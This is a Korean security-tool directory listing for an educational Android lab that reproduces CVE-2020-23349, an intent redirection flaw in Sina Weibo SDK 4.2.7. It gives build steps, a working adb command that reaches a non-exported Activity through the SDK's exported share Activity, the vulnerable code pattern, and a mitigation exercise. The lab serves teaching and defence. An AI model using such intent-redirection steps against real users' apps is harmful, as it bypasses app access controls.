Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-23349_Lab — Sina Weibo SDK 4.2.7의 CVE-2020-23349에 대한 교육용 Android 랩 | Kitploit
도구/GitHubGitHub/lazybear8372/cve-2020-23349_lab
Android SecurityVulnerability AnalysisExploitationMobile App PentestingMobile SecurityLearning & EducationLabs & Practice
GitHublazybear8372/cve-2020-23349_lab

CVE-2020-23349_Lab

Sina Weibo SDK 4.2.7의 CVE-2020-23349에 대한 교육용 Android 랩

저장소 보기
91개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-23349 Android Lab

Sina Weibo Android SDK 4.2.7의 Intent Redirection 취약점을 로컬에서 재현하는 교육용 프로젝트입니다.

허가된 테스트 기기 또는 에뮬레이터에서만 사용하세요. 실제 사용자 앱을 대상으로 사용하면 안 됩니다.

구성

  • victim: 실제 openDefault-4.2.7.aar을 포함한 취약 앱
  • attacker: exported WbShareTransActivity를 호출하는 공격 앱
  • victim/.../PrivateActivity: android:exported="false"인 재현 대상

취약 흐름은 다음과 같습니다.

root@kitploit:~
Attacker 앱
  -> exported WbShareTransActivity
  -> Intent Extra의 startActivity/gotoActivity
  -> victim의 PrivateActivity 실행

빌드

Android SDK 36과 JDK 17이 필요합니다.

root@kitploit:~
./gradlew clean assembleDebug

생성 파일:

root@kitploit:~
victim/build/outputs/apk/debug/victim-debug.apk
attacker/build/outputs/apk/debug/attacker-debug.apk

설치 및 재현

root@kitploit:~
adb install -r victim/build/outputs/apk/debug/victim-debug.apk
adb install -r attacker/build/outputs/apk/debug/attacker-debug.apk
adb shell am start -n lab.cve202023349.attacker/.MainActivity
  1. 필요하면 Victim 앱을 한 번 실행합니다.
  2. Attacker 앱에서 Launch private Activity 버튼을 누릅니다.
  3. EXPLOIT SUCCESS 화면이 나타나면 재현 성공입니다.

ADB로 직접 재현할 수도 있습니다.

root@kitploit:~
adb shell am start \
  -n lab.cve202023349.victim/com.sina.weibo.sdk.share.WbShareTransActivity \
  --es startActivity lab.cve202023349.victim.PrivateActivity \
  --es gotoActivity lab.cve202023349.victim.PrivateActivity

왜 동작하는가

SDK 4.2.7은 외부 Intent의 startActivity와 gotoActivity 문자열을 신뢰하고 다음과 같은 형태로 사용합니다.

root@kitploit:~
resultIntent.setClassName(this, startActivityName);
startActivity(resultIntent);

this는 Victim 앱의 Context이므로 Android는 Victim 앱이 자기 private Activity를 실행하는 것으로 처리합니다.

현대 Android 빌드에서는 android:exported를 명시해야 하므로, 이 프로젝트는 과거 SDK의 암묵적 exported 상태를 재현하기 위해 victim/AndroidManifest.xml에서 명시적으로 true를 지정했습니다.

완화 실습

공유 기능이 필요하지 않은 실습에서는 다음 값을 false로 변경하고 다시 빌드합니다.

root@kitploit:~
<activity
    android:name="com.sina.weibo.sdk.share.WbShareTransActivity"
    android:exported="false" />

이후 같은 공격을 수행하면 SecurityException으로 차단됩니다. 실제 제품에서는 Weibo SDK 4.x를 제거하고 최신 유지보수 버전으로 업그레이드해야 합니다.

SDK 출처

포함된 AAR은 Sina Weibo 공식 공개 저장소의 4.2.7 커밋에서 가져왔습니다.

  • 저장소: https://github.com/sinaweibosdk/weibo_android_sdk
  • 커밋: 99daf8a (4.2.7)
  • 파일: 新文档/openDefault-4.2.7.aar
도구 다운로드